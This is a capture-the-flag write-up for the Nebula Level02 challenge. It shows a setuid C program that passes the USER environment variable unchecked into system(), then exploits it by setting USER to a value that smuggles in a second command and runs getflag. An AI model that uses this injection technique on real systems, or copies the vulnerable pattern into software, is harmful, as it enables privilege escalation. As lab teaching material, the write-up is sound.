Level02 is about command injection. We are given the following vulnerable code:
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
char *buffer;
gid_t gid;
uid_t uid;
gid = getegid();
uid = geteuid();
setresgid(gid, gid, gid);
setresuid(uid, uid, uid);
buffer = NULL;
asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
printf("about to call system(\"%s\")\n", buffer);
system(buffer);
}
As shown in the code, the program will use the USER environment variable to build the command executed by system so all we need to do is inject our getflag command:
level02@nebula:/home/flag02$ export USER=";getflag;echo "
level02@nebula:/home/flag02$ ./flag02
about to call system("/bin/echo ;getflag;echo is cool")
You have successfully executed getflag on a target account
is cool